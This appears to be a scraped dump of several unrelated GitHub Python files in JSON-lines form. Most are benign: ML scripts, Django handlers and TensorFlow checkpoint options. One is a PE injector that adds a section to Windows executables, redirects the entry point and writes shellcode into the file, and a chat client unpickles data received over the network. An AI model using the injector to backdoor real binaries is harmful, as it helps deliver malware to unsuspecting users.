80')\r\nprint(t[0].show())\r\n","repo_name":"segev-harpaz/project","sub_path":"project/project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29455355865","text":"import sys\nfrom inject.shellcode import Shellcode\nfrom inject.output import Output\nfrom inject.pe_manager import PEManager\nfrom inject.common import CommonMixin\nfrom typing import List\nfrom pathlib import Path\nfrom shutil import copy\nfrom utils import shellcode_encoder\nimport mmap\nfrom struct import pack\nfrom pefile import PE\n\nHEADER_SIZE = 40\nEXTRA_SIZE_TO_RESTORE = 8\n\n\nclass Injector(CommonMixin):\n def __init__(\n self, shellcode: bytes, file: Path, output: Path, options: dict = None\n ):\n # Verbosity\n options = options or {}\n\n # Set Basics\n self.shellcode: Shellcode = Shellcode(shellcode, options)\n self.output: Output = Output(\n output, file, {\"log_level\": int(options.get(\"log_level\", 1))}\n )\n\n # Strategies\n self.cave = options.get(\"cave\", \"auto\")\n self.enter = options.get(\"enter\", \"jump\")\n self.encoder = options.get(\"encoder\", \"\")\n\n # Loaded /Computed Later\n self.manager: PEManager = None\n\n super().__init__(options)\n\n def inject(self):\n self.setup()\n if self.cave == \"new-section\":\n self.expand()\n self.create_new_section() # may regenerate PE\n else:\n print(f\"[!] Cave option {self.cave} is not supported or recognized.\")\n sys.exit()\n if self.enter == \"new-section\":\n self.enter_at_last_section()\n self.manager.save()\n elif self.enter == \"jump\":\n original_ins = self.manager.get_ins(take=6)\n self.enter_with_jump()\n self.manager.save()\n new_ins = self.manager.get_ins(take=6)\n self.out(\"-- Original Starting Instructions --\")\n self.manager.outins(original_ins)\n self.out(\"-- Modified Starting Instructions --\")\n self.manager.outins(new_ins)\n else:\n print(f\"[!] Enter option {self.enter} is not supported or recognized.\")\n sys.exit()\n\n if self.encoder:\n self.write_encoded_shellcode()\n else:\n self.write_shellcode()\n self.manager.save()\n self.out(\"-- Injection Complete --\", level=3)\n\n def create_new_section(self):\n self.load_required()\n self.out(\"-- Creating New Section --\", level=2)\n self.manager = self.manager.create_new_section(self.shellcode, \".extra\")\n\n def enter_at_last_section(self):\n self.out(\"-- Changing Entry Point --\", level=2)\n self.manager = self.manager.enter_at_last_section()\n\n def enter_with_jump(self):\n self.out(\"-- Changing Entry Point --\", level=2)\n self.manager = self.manager.enter_with_jump(self.shellcode)\n\n def write_encoded_shellcode(self):\n self.out(\"-- Injecting Encoded Shellcode --\", level=2)\n self.manager.write_shellcode_stub(self.shellcode)\n self.manager.write_shellcode_blob(self.shellcode)\n\n def write_shellcode(self):\n self.out(\"-- Injecting Shellcode --\", level=2)\n self.manager.write_shellcode(self.shellcode)\n\n def setup(self):\n self.init()\n self.load()\n\n def init(self):\n self.out(\"-- Preparing Output --\", level=2)\n # delete old output if it exists\n self.output.clean()\n # copy source file to output file\n self.output.create_from_source()\n\n def init_required(self):\n if not self.is_init():\n msg = \"[!] PEManager not initialized. Output may not exist. Please call 'init' first.\"\n print(msg)\n sys.exit()\n\n def is_init(self) -> bool:\n if not self.output.exists():\n return False\n return True\n\n def expand(self):\n self.out(\"-- Expanding File --\", level=2)\n # actually expand the file\n self.output.expand_for_sc(\n self.shellcode.get_final_size(), self.manager.file_alignment()\n )\n\n def load(self):\n self.init_required()\n self.manager = PEManager(self.output, options={\"log_level\": self.log_level})\n self.out(\"-- PE Basic Info --\")\n self.manager.dump_basic_info()\n\n def load_required(self):\n if not self.is_loaded():\n print('[!] PE was not loaded into \"manager\" target on PEManager')\n sys.exit()\n\n def is_loaded(self) -> bool:\n if not self.manager:\n return False\n return True\n","repo_name":"3lpsy/exutils","sub_path":"inject/injector.py","file_name":"injector.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"10096792294","text":"import os\nimport argparse\nimport model\nimport torch\nfrom configparser import ConfigParser\nfrom operator import attrgetter\nfrom utils.watcher import ActivationWatcher\nfrom model.lenet import LeNet\n\nnum_classes = {\"imagenet\": 1000, \"cifar10\": 10, \"cifar100\": 100}\nparser = argparse.ArgumentParser()\n# setup for model\nparser.add_argument('--model', default='', help='model', type=str)\nparser.add_argument('--config', default='', type=str,\n help='use configure for words and blocksize')\nparser.add_argument('--dataset', default='imagenet', type=str,\n help=\"dataset\")\nparser.add_argument('--conv-word', default=0, help='words update conv layer', type=int)\nparser.add_argument('--conv-block', default=1.0, help='blocksize update conv layer', type=float)\nparser.add_argument('--fc-word', default=0, help='words update fc layer', type=int)\nparser.add_argument('--fc-block', default=1.0, help='blocksize update fc layer', type=float)\n\nparser.add_argument('--init', default=0, help='initialize', type=int)\nparser.add_argument('--conv-word-init', default=0, help='conv words initialize', type=int)\nparser.add_argument('--conv-block-init', default=0, help='conv blocksize initialize', type=int)\nparser.add_argument('--fc-word-init', default=0, help='fc words initialize', type=int)\nparser.add_argument('--fc-block-init', default=0, help='fc blocksize initialize', type=int)\n\n\n\ndef compute_rate(layers, rate=0.95):\n layer_rate = {}\n weight = {}\n total = 0\n for layer in layers:\n weight[layer] = attrgetter(layer+ '.weight.data')(model).detach().numel()\n total += weight[layer]\n for layer in layers:\n layer_rate[layer] = pow(weight[layer]/total, 2)\n return layer_rate\n\nif __name__=='__main__':\n args = parser.parse_args()\n blockconfig = ConfigParser()\n wordconfig = ConfigParser()\n blockconfig.read(os.path.join(args.config, 'block.config'), encoding='UTF-8')\n wordconfig.read(os.path.join(args.config, 'word.config'), encoding='UTF-8')\n model = model.__dict__[args.model](pretrained=(args.dataset == 'imagenet'), num_classes=num_classes[args.dataset])\n watcher = ActivationWatcher(model)\n layers = [layer for layer in watcher.layers[13:]]\n\n #layer_rate = compute_rate(layers=layers)\n for layer in layers:\n #update the words \n if(layer in wordconfig[args.model]):\n current_words = int(wordconfig[args.model][layer])\n if 'conv' in layer or 'features' in layer:\n if args.init and args.conv_word_init:\n wordconfig[args.model][layer] = str(args.conv_word_init)\n else:\n wordconfig[args.model][layer] = str(int(current_words - args.conv_word)) #\n if 'fc' in layer or 'classifier' in layer or 'linear' in layer:\n if args.init and args.fc_word_init:\n wordconfig[args.model][layer] = str(args.fc_word_init)\n else:\n wordconfig[args.model][layer] = str(int(current_words - args.fc_word)) #\n else: # initialization\n wordconfig.set(args.model, layer, str(0))\n with open(os.path.join(args.config, 'word.config'), 'w', encoding='utf-8') as wordfile:\n wordconfig.write(wordfile)\n \n #update the blocks\n if(layer in blockconfig[args.model]):\n current_block = int(blockconfig[args.model][layer])\n if 'conv' in layer or 'features' in layer:\n if args.init and args.conv_block_init:\n blockconfig[args.model][layer] = str(args.conv_block_init)\n else:\n blockconfig[args.model][layer] = str(int(current_block * args.conv_block))\n if 'fc' in layer or 'classifier' in layer or 'linear' in layer:\n if args.init and args.fc_block_init:\n blockconfig[args.model][layer] = str(args.fc_block_init)\n else:\n blockconfig[args.model][layer] = str(int(current_block * args.fc_block))\n else: # initialization\n blockconfig.set(args.model, layer, str(0))\n with open(os.path.join(args.config, 'block.config'), 'w', encoding='utf-8') as blockfile:\n blockconfig.write(blockfile)\n \n wordfile.close()\n blockfile.close()\n","repo_name":"DiamondSheep/GroupDPL","sub_path":"update_config.py","file_name":"update_config.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9567147524","text":"from django.db.models.signals import post_save\r\nfrom django.dispatch import receiver\r\nfrom django.utils.text import slugify, Truncator\r\n\r\nfrom opencivicdata.core.models import (\r\n Organization as OCDOrganization,\r\n Person as OCDPerson,\r\n Post as OCDPost,\r\n)\r\nfrom opencivicdata.legislative.models import (\r\n Event as OCDEvent,\r\n Bill as OCDBill,\r\n EventRelatedEntity as OCDEventRelatedEntity,\r\n)\r\n\r\nfrom councilmatic_core.models import (\r\n Organization as CouncilmaticOrganization,\r\n Person as CouncilmaticPerson,\r\n Event as CouncilmaticEvent,\r\n Bill as CouncilmaticBill,\r\n Post as CouncilmaticPost,\r\n)\r\n\r\n\r\n@receiver(post_save, sender=OCDOrganization)\r\ndef create_councilmatic_org(sender, instance, created, **kwargs):\r\n if created:\r\n ocd_part = instance.id.rsplit(\"-\", 1)[-1]\r\n slug = \"{0}-{1}\".format(slugify(instance.name), ocd_part)\r\n\r\n co = CouncilmaticOrganization(organization=instance, slug=slug)\r\n # just update the child table, not the parent table\r\n co.save_base(raw=True)\r\n\r\n\r\n@receiver(post_save, sender=OCDPerson)\r\ndef create_councilmatic_person(sender, instance, created, **kwargs):\r\n if created:\r\n ocd_part = instance.id.rsplit(\"-\", 1)[-1]\r\n slug = \"{0}-{1}\".format(slugify(instance.name), ocd_part)\r\n\r\n cp = CouncilmaticPerson(person=instance, slug=slug)\r\n # just update the child table, not the parent table\r\n cp.save_base(raw=True)\r\n\r\n\r\n@receiver(post_save, sender=OCDEvent)\r\ndef create_councilmatic_event(sender, instance, created, **kwargs):\r\n if created:\r\n truncator = Truncator(instance.name)\r\n ocd_part = instance.id.rsplit(\"-\", 1)[-1]\r\n slug = \"{0}-{1}\".format(slugify(truncator.words(5)), ocd_part)\r\n\r\n ce = CouncilmaticEvent(event=instance, slug=slug)\r\n\r\n # just update the child table, not the parent table\r\n ce.save_base(raw=True)\r\n\r\n for entity in OCDEventRelatedEntity.objects.filter(\r\n agenda_item__event=instance, bill__isnull=False\r\n ):\r\n cb = entity.bill.councilmatic_bill\r\n cb.last_action_date = cb.get_last_action_date()\r\n cb.save_base(raw=True)\r\n\r\n\r\n@receiver(post_save, sender=OCDBill)\r\ndef create_councilmatic_bill(sender, instance, created, **kwargs):\r\n if created:\r\n slug = slugify(instance.identifier)\r\n\r\n cb = CouncilmaticBill(bill=instance, slug=slug)\r\n\r\n else:\r\n cb = instance.councilmatic_bill\r\n\r\n cb.last_action_date = cb.get_last_action_date()\r\n\r\n # just update the child table, not the parent table\r\n cb.save_base(raw=True)\r\n\r\n\r\n@receiver(post_save, sender=OCDPost)\r\ndef create_councilmatic_post(sender, instance, created, **kwargs):\r\n if created:\r\n cp = CouncilmaticPost(post=instance)\r\n cp.save_base(raw=True)\r\n","repo_name":"datamade/django-councilmatic","sub_path":"councilmatic_core/signals/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"44"} +{"seq_id":"74872053571","text":"import argparse\nimport torch\nimport torch.utils.data\nfrom torch import nn, optim\nfrom torch.nn import functional as F\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\n\nimport classify_svhn as svhn\n\nimport matplotlib.pyplot as plt\n\n\n##This code was inspired from:\n#https://github.com/pytorch/examples/blob/master/vae/main.py\n\n\nclass VAE(nn.Module):\n\tdef __init__(self):\n\t\tsuper(VAE, self).__init__()\n\t\t##Encoder\n\t\tconv_e = nn.Sequential(\n\t\t\t\tnn.Conv2d(3, 32, kernel_size=3, bias=True, stride=1),\n\t\t\t\tnn.ReLU(),\n\n\t\t\t\tnn.AvgPool2d(kernel_size=2, stride=2),\n\t\t\t\tnn.Conv2d(32, 64, kernel_size=3, bias=True, stride=1),\n\t\t\t\tnn.ReLU(),\n\n\t\t\t\tnn.AvgPool2d(kernel_size=2, stride=2),\n\t\t\t\tnn.Conv2d(64, 256, kernel_size=5, bias=True, stride=1),\n\t\t\t\tnn.ReLU(),\n\n\t\t\t\tnn.Conv2d(256, 256, kernel_size=1, bias=True, stride=1),\n\t\t\t\tnn.ReLU(),\n\n\t\t\t\tnn.Conv2d(256, 256, kernel_size=1, bias=True, stride=1),\n\t\t\t\tnn.ReLU()\n\t\t\t\t\n\t\t\t)\n\n\t\tlinear_e = nn.Linear(1024, 100*2)\n\n\t\tself.encoder = nn.ModuleList([conv_e, linear_e])\n\n\t\t##Decoder\n\t\t#conv_d = nn.Sequential(\n\t\t#Takes z latent variable of size 100\n\t\t\t\t#nn.Conv2d(256, 64, kernel_size=3, bias=True, stride=1, padding=2),\n\t\t\t\t#nn.ReLU(),\n\t\t\t\t#nn.UpsamplingBilinear2d(size=None, scale_factor=2),\n\t\t\t\t#nn.Conv2d(64, 32, kernel_size=3, bias=True, stride=1, padding=2),\n\t\t\t\t#nn.ReLU(),\n\t\t\t\t#nn.UpsamplingBilinear2d(size=None, scale_factor=2),\n\t\t\t\t#nn.Conv2d(32, 16, kernel_size=3, bias=True, stride=1, padding=2),\n\t\t\t\t#nn.ReLU(),\n\t\t\t\t#nn.UpsamplingBilinear2d(size=None, scale_factor=2),\n\t\t\t\t#nn.Conv2d(16, 8, kernel_size=3, bias=True, stride=1, padding=0),\n\t\t\t\t#nn.ReLU(),\n\t\t\t\t#nn.Conv2d(8, 3, kernel_size=3, bias=True, stride=1, padding=0),\n\n\n\t\t\t#)\n\n\t\t#linear_d = nn.Linear(100, 256)\n\t\t#relu = nn.ReLU()\n\n\t\t#self.decoder = nn.ModuleList([linear_d, relu, conv_d])\n\n\t\tself.decoder = nn.Sequential(\n\t\t nn.Linear(100, 128),\n\t\t nn.LeakyReLU(0.2, inplace=True),\n\t\t nn.Linear(128, 256),\n\t\t nn.LeakyReLU(0.2, inplace=True),\n\t\t nn.Linear(256, 512),\n\t\t nn.LeakyReLU(0.2, inplace=True),\n\t\t nn.Linear(512, 1024),\n\t\t nn.LeakyReLU(0.2, inplace=True),\n\t\t nn.Linear(1024, 3072)\n\t )\n\n\n\t#Outputs mean/log-variance\n\tdef encode(self, x):\n\n\t\tz = self.encoder[0](x)\n\t\t#Reshape for FC\n\t\tz = z.view(z.size(0), -1)\n\n\t\t#print(z.shape)\n\n\t\t#Outputs 2 vectors of size 100, mean vector and std vector\n\t\t#print(z.shape)\n\t\tz = self.encoder[1](z)\n\n\t\t#first 100 for mean vector, the other 100 for logvar\n\t\treturn z[:, :100], z[:, 100:]\n\n\t#Outputs reconstructed x\n\tdef decode(self, z):\n\t\t#z = self.linear_d(z)\n\t\t#z = self.decoder[0](z)\n\t\t#z = self.decoder[1](z)\n\t\t\n\t\t#Get dim of z to know if we are processing batches or 1 example\n\t\t#dim_z = len(z.shape)\n\n\t\t#if(dim_z == 1):\n\t\t\t#Reshape z from 1 dim to 4 dim\t\n\t\t#\tz = z.view(1, z.shape[0], 1, 1)\n\t\t#else:\n\t\t\t#Reshape z from 2 dim to 4 dim\n\t\t#\tz = z.view(z.shape[0], z.shape[1], 1, 1)\n\t\t#print(z.shape)\n\n\t\t#recon_x = self.decoder[2](z)\n\n\t\t#print(z.shape)\n\n\t\trecon_x = self.decoder(z)\n\n\t\t#Different results with sigmoid because of normalization scheme\n\t\trecon_x = torch.tanh(recon_x)\n\t\t\n\t\treturn recon_x\n\n\t#Sampling by re-perameterization trick\n\tdef reparameterize(self, mu, logvar):\n\t\t#Need std for normal distribution\n\t\tstd = torch.exp(0.5*logvar)\n\t\teps = torch.randn_like(std)\n\t\tz = mu + eps*std\n\t\treturn z\n\n\n\tdef forward(self, x):\n\t\tmu, logvar = self.encode(x)\n\t\tz = self.reparameterize(mu, logvar)\n\t\t#z = (batch,latent_space)\n\t\trecon_x = self.decode(z)\n\t\treturn recon_x, mu, logvar\n\n\n\n# Reconstruction + KL divergence losses summed over all elements of batch\ndef loss_elbo(recon_x, x, mu, logvar):\n\n\t#Use MSE loss because we are dealing with RGB images\n\tloss = nn.MSELoss(reduction='sum')\n\tmarginal_likelihood = loss(recon_x.view(recon_x.shape[0], 3, x.shape[2]**2), x.view(x.shape[0], x.shape[1], x.shape[2]**2))\n\t\n\t#marginal_likelihood = loss(recon_x.view(recon_x.shape[0], recon_x.shape[1], recon_x.shape[2]**2), x.view(x.shape[0], x.shape[1], x.shape[2]**2))\n\tKLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\n\t#print(\"KL divergence: \"+str(KLD.item()))\n\n\tloss = marginal_likelihood + KLD\n\n\treturn loss\n\n\ndef train(epoch, train_loader):\n\t#Mode train\n\tmodel.train()\n\n\ttrain_loss = 0\n\n\tfor i, inputs in enumerate(train_loader):\n\n\t\tx = inputs[0]\n\t\ty = inputs[1]\n\t\t\n\t\tx = x.to(device)\n\t\toptimizer.zero_grad()\n\n\t\trecon_batch, mu, logvar = model(x)\n\t\tloss = loss_elbo(recon_batch, x, mu, logvar)\n\t\tloss.backward()\n\t\ttrain_loss += loss.item()\n\t\toptimizer.step()\n\n\t\tif i % 100 == 0:\n\t\t\tprint('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n\t\t\t\tepoch, i * len(x), len(train_loader.dataset),\n\t\t\t\t100. * i / len(train_loader),\n\t\t\t\tloss.item() / len(x)))\n\n\tprint('====> Epoch: {} Average loss: {:.4f}'.format(\n\t\t epoch, train_loss / len(train_loader.dataset)))\n\n\ndef eval(epoch, valid_loader):\n\t#Mode eval\n\tmodel.eval()\n\n\tepoch_loss = 0\n\n\twith torch.no_grad():\n\n\t\tfor i, inputs in enumerate(test_loader):\n\n\t\t\tx = inputs[0]\n\t\t\ty = inputs[1]\n\n\t\t\tx = x.to(device)\n\t\t\trecon_batch, mu, logvar = model(x)\n\t\t\tepoch_loss += loss_elbo(recon_batch, x, mu, logvar).item()\n\t\t\t\t\n\tepoch_loss /= len(test_loader.dataset)\n\tprint('====> Test Average loss: {:.4f}'.format(epoch_loss))\n\n\n#Disentangled representation Q3.2\n#epsilon is the small perturbation\n#Accepts one sample z (latent_space)\n#Saves 100 (latent_space dimension) images\ndef disentangled(z, model, epsilon=5):\n\n\tlatent_space = z.shape[0]\n\t#Loop over the dimensions of latent space\n\tnew_z = z.clone()\n\n\tfor i in range(latent_space):\n\t\t\n\t\tnew_z[i] = z[i] + epsilon \n\t\tsample = model.decode(new_z)\n\n\t\tsave_image(sample.view(1, 3, 32, 32),\n\t\t\t\t\t 'Disentangled representation/sample_' + str(i) + '.png', normalize=True)\n\n\t\tnew_z = z.clone()\n\n#Q3.3\n#Accepts one sample z (latent_space)\n#Saves 2+n images (from the two z samples and their (number of alpha) interpolations)\ndef interpolating(z0, z1, method, model):\n\talpha = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1]\n\n\tsample = torch.zeros([len(alpha),3, 32, 32])\n\n\t#(a)Interpolate latent space\n\tif(method=='latent'):\n\t\ti = 0\n\t\tfor a in alpha:\n\t\t\tnew_z = a * z0 + (1 - a)*z1\n\n\t\t\taux = model.decode(new_z)\n\t\t\tsample[i, :, :, :] = aux.view(1, 3, 32, 32)\n\t\t\ti += 1\n\n\t\tsave_image(sample.view(len(alpha), 3, 32, 32),\n\t\t\t\t\t 'Interpolation/latent space/sample.png', normalize=True)\n\n\t#(b)Interpolate image space \n\t\n\telif(method=='image'):\n\n\t\tsample0 = model.decode(z0)\n\n\t\tsave_image(sample0.view(1, 3, 32, 32),\n\t\t\t\t\t 'Interpolation/image space/sample0.png', normalize=True)\n\n\t\tsample1 = model.decode(z1)\n\n\t\tsave_image(sample1.view(1, 3, 32, 32),\n\t\t\t\t\t 'Interpolation/image space/sample1.png', normalize=True)\n\n\n\t\ti = 0\n\t\tfor a in alpha:\n\n\t\t\taux = a * sample0 + (1 - a) * sample1\n\t\t\tsample[i, :, :, :] = aux.view(1, 3, 32, 32)\n\t\t\ti += 1\n\n\t\tsave_image(sample.view(len(alpha), 3, 32, 32),\n\t\t\t\t\t 'Interpolation/image space/sample.png', normalize=True)\n\n\n\nif __name__ == \"__main__\":\n\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\tmodel = VAE().to(device)\n\toptimizer = optim.Adam(model.parameters(), lr=3e-4)\n\n\t###Training###\n\n\t#n_epochs = 50\n\n\t#Load data\n\ttrain_loader, valid_loader, test_loader = svhn.get_data_loader(\"svhn\", 32)\n\n\t#Train + val\n\t#for epoch in range(n_epochs):\n\t#\ttrain(epoch, train_loader)\n\t#\teval(epoch, valid_loader)\n\n\t#\twith torch.no_grad():\n\t\t\t#Generate a batch of images using current parameters \n\t\t\t#Sample z from prior p(z) = N(0,1)\n\t#\t\tsample = torch.randn(16, 100).to(device)\n\t#\t\tsample = model.decode(sample)\n\t#\t\tsave_image(sample.view(16, 3, 32, 32),\n\t#\t\t\t\t 'results/sample_' + str(epoch) + '.png', normalize=True)\n\n\n\t#Saving the model weights\n\t#torch.save(model.state_dict(), 'weights/weights.h5')\n\n\n\t###Qualitative Evaluation###\n\n\tpath_weights = 'weights/weights.h5'\n\n\tdevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\tmodel.load_state_dict(torch.load(path_weights))\n\tprint(\"Model successfully loaded\")\n\n\t#put the model in eval mode\n\tmodel = model.eval()\n\n\t#Sample z from prior p(z) = N(0,1)\n\t#sample = torch.randn(48, 100).to(device)\n\t#sample = model.decode(sample)\n\t#save_image(sample.view(48, 3, 32, 32),\n\t#\t\t\t 'samples_vae.png', normalize=True)\n\n\t#Q3.2\n\t#Sample z from prior p(z)=N(0,1)\n\t#z = torch.randn(100).to(device)\n\t#disentangled(z, model)\n\n\t#Q3.3\n\t#Sample two z from prior p(z)=N(0,1)\n\tz1 = torch.randn(100).to(device)\n\tz2 = torch.randn(100).to(device)\n\tinterpolating(z1, z2, 'image', model)\n","repo_name":"faresbs/Representation-Learning","sub_path":"assignment3/Problem3/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":8391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"33363506140","text":"from twisted.internet import reactor, protocol\nfrom twisted.internet.protocol import ReconnectingClientFactory as ClFactory\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\nimport pickle\n\n\nclass Client(protocol.Protocol):\n def __init__(self):\n reactor.callInThread(self.send_message)\n\n def send_message(self):\n while True:\n self.transport.write(pickle.dumps(input()))\n\n\n def dataReceived(self, data):\n data = pickle.loads(data)\n print(type(data))\n if isinstance(data, list):\n print(\"Connected members:\")\n print(*data, sep=\", \")\n else:\n print(data)\n \n\n\nclass ClientFactory(ClFactory):\n def clientConnectionLost(self, connector, unused_reason):\n self.retry(connector)\n\n def clientConnectionFailed(self, connector, reason):\n print(reason)\n self.retry(connector)\n\n def buildProtocol(self, addr):\n return Client()\n\n\nif __name__ == '__main__':\n endpoint = TCP4ClientEndpoint(reactor, 'localhost', 12345)\n endpoint.connect(ClientFactory())\n reactor.run()","repo_name":"afromanjohan/pickle-networking","sub_path":"clientpickle.py","file_name":"clientpickle.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43397894010","text":"from dados.dados import lista_candidatos,lista_voto\nfrom time import sleep\n\nclass Eleitor:\n\n nome = input(\"Qual o nome do Eleitor: \").strip()\n n_titulo = input(\"Digite o número do título: \").strip()\n voto_presidente = int(input(\"Digite seu voto: \").strip())\n\n def __init__(self,nome_eleitor,titulo=False):\n self.nome_eleitor = nome_eleitor\n self.titulo = titulo\n\n def eleitor_atual(self):\n if self.nome_eleitor.isnumeric():\n self.nome = input(\"Nome incorreto!! Digite apenas letra: \")\n\n self.logado = True\n\n def verificar_titulo(self):\n while True:\n if len(self.n_titulo) == 12:\n self.titulo = True\n break\n else:\n self.n_titulo = input(\"Digite por favor o número do titulo corretamente: \")\n continue\n\n def voto(self):\n\n for i,v in lista_candidatos.items():\n if self.voto_presidente == v:\n confirmar = input(f\"Confirmar voto em {i} [S/N]: \").upper()\n if confirmar == \"S\":\n print(\"...\")\n sleep(1)\n print(\"\\033[32mVoto Registrado!!\")\n\n if self.voto_presidente not in lista_candidatos.values():\n print(\"Candidato inválido!!\")\n self.voto_presidente = int(input(\"Seu voto: \"))\n lista_voto.append(self.voto_presidente)\n","repo_name":"Geronimonetto/Projeto_Voto","sub_path":"function/Eleitor.py","file_name":"Eleitor.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2568627552","text":"from paramiko import SSHClient\nfrom scp import SCPClient\n\nfrom settings import REMOTE_HOST\n\n\ndef remote_copy(\n logger, ssh_client: SSHClient, local_path: str, remote_path: str, db_filename: str\n) -> None:\n \"\"\"\n Initiate distant file transfer.\n SCPClient takes a paramiko transport as its only argument\n \"\"\"\n transport = ssh_client.get_transport()\n if transport:\n scp = SCPClient(transport)\n try:\n scp.put(\n f\"{local_path}/{db_filename}\",\n f\"{remote_path}/{db_filename}\",\n )\n logger.success(\n f\"Backup file '{db_filename}' has been copied on '{REMOTE_HOST}'\"\n )\n except Exception as e:\n logger.error(\n f\"Error while copying '{db_filename}' on '{REMOTE_HOST}': {str(e)}\"\n )\n scp.close()\n","repo_name":"bolinocroustibat/databases-backup-over-scp","sub_path":"helpers/remote_copy.py","file_name":"remote_copy.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"15865838330","text":"import numpy as np\n\ndef sigmoid(x):\n\treturn 1 / (1 + np.exp(-x))\n\ndef sigmoid_derivative(x):\n\treturn x * (1 - x)\n\ntraining_inputs = np.array([[0, 0, 1],\n\t\t\t\t\t\t [1, 1, 1],\n\t\t\t\t\t\t [1, 0, 1],\n\t\t\t\t\t\t [0, 1, 1],\n\t\t\t\t\t\t [0, 1, 0]])\n\ntraining_outputs = np.array([[0, 1, 1, 0, 0]]).T\n\n#same random numbers\nnp.random.seed(2)\n\nsynaptic_weights = 2 * np.random.random((3, 1)) - 1\n\nprint('Random starting synaptic weights')\nprint(synaptic_weights)\n\nfor i in range(1):\n\tinputs = training_inputs\n\toutputs = sigmoid(np.dot(inputs, synaptic_weights))\n\tdifference = training_outputs - outputs \n\tadjustments = difference * sigmoid_derivative(outputs)\n\tprint(inputs.T)\n\tprint(adjustments)\n\tsynaptic_weights += np.dot(inputs.T, adjustments)\n\tprint(synaptic_weights)\n\nprint('Final synaptic weights')\nprint(synaptic_weights)\n\nprint('Write input values')\na = int(input('A = '))\nb = int(input('B = '))\nc = int(input('C = '))\nnew_input = np.array([[a, b, c]])\noutput = sigmoid(np.dot(new_input, synaptic_weights))\n\nprint('Result for [' + str(a) + ', ' + str(b) + ', ' + str(c) + ']')\nprint(output)\n\ninput()","repo_name":"VadimKudryavcev/Tiny-Neural-Network","sub_path":"tiny_neural_network.py","file_name":"tiny_neural_network.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4000186364","text":"import copy\nimport inspect\n\nfrom tensorflow.python.util.deprecation import deprecated_args\nfrom tensorflow.python.util.tf_export import tf_export\n\n\n@tf_export(\"train.CheckpointOptions\")\nclass CheckpointOptions(object):\n \"\"\"Options for constructing a Checkpoint.\n\n Used as the `options` argument to either `tf.train.Checkpoint.save()` or\n `tf.train.Checkpoint.restore()` methods to adjust how variables are\n saved/restored.\n\n Example: Run IO ops on \"localhost\" while saving a checkpoint:\n\n ```\n step = tf.Variable(0, name=\"step\")\n checkpoint = tf.train.Checkpoint(step=step)\n options = tf.train.CheckpointOptions(experimental_io_device=\"/job:localhost\")\n checkpoint.save(\"/tmp/ckpt\", options=options)\n ```\n \"\"\"\n\n # Define object attributes in __slots__ for improved memory and performance.\n __slots__ = (\n \"experimental_io_device\",\n \"experimental_enable_async_checkpoint\",\n \"experimental_write_callbacks\",\n \"enable_async\",\n )\n\n @deprecated_args(\n None, \"Use enable_async instead\", \"experimental_enable_async_checkpoint\"\n )\n def __init__(\n self,\n experimental_io_device=None,\n experimental_enable_async_checkpoint=False,\n experimental_write_callbacks=None,\n enable_async=False,\n ):\n \"\"\"Creates an object that stores options for a Checkpoint.\n\n Args:\n experimental_io_device: string. Applies in a distributed setting.\n Tensorflow device to use to access the filesystem. If `None` (default)\n then for each variable the filesystem is accessed from the CPU:0 device\n of the host where that variable is assigned. If specified, the\n filesystem is instead accessed from that device for all variables.\n\n This is for example useful if you want to save to a local directory,\n such as \"/tmp\" when running in a distributed setting. In that case pass\n a device for the host where the \"/tmp\" directory is accessible.\n\n experimental_enable_async_checkpoint: bool Type. Deprecated, please use\n the enable_async option.\n\n experimental_write_callbacks: List[Callable]. A list of callback functions\n that will be executed after each saving event finishes (i.e. after\n `save()` or `write()`). For async checkpoint, the callbacks will be\n executed only after the async thread finishes saving.\n\n The return values of the callback(s) will be ignored. The callback(s)\n can optionally take the `save_path` (the result of `save()` or\n `write()`) as an argument. The callbacks will be executed in the same\n order of this list after the checkpoint has been written.\n\n enable_async: bool Type. Indicates whether async checkpointing is enabled.\n Default is False, i.e., no async checkpoint.\n\n Async checkpoint moves the checkpoint file writing off the main thread,\n so that the model can continue to train while the checkpoing file\n writing runs in the background. Async checkpoint reduces TPU device idle\n cycles and speeds up model training process, while memory consumption\n may increase.\n \"\"\"\n self.experimental_io_device = experimental_io_device\n self.enable_async = experimental_enable_async_checkpoint or enable_async\n self.experimental_enable_async_checkpoint = self.enable_async\n # Ensure that each callback only has either 0 or 1 parameter\n if experimental_write_callbacks is not None:\n for callback in experimental_write_callbacks:\n assert len(inspect.signature(callback).parameters) <= 1\n self.experimental_write_callbacks = experimental_write_callbacks\n\n def __copy__(self):\n # Only `experimental_write_callbacks` needs special treatment to Ensure that\n # the list is deep-copied, but the callbacks are not deep-copied.\n result = copy.copy(super()) # First invoke the non-overridden copy method.\n result.experimental_write_callbacks = copy.copy(\n self.experimental_write_callbacks\n )\n return 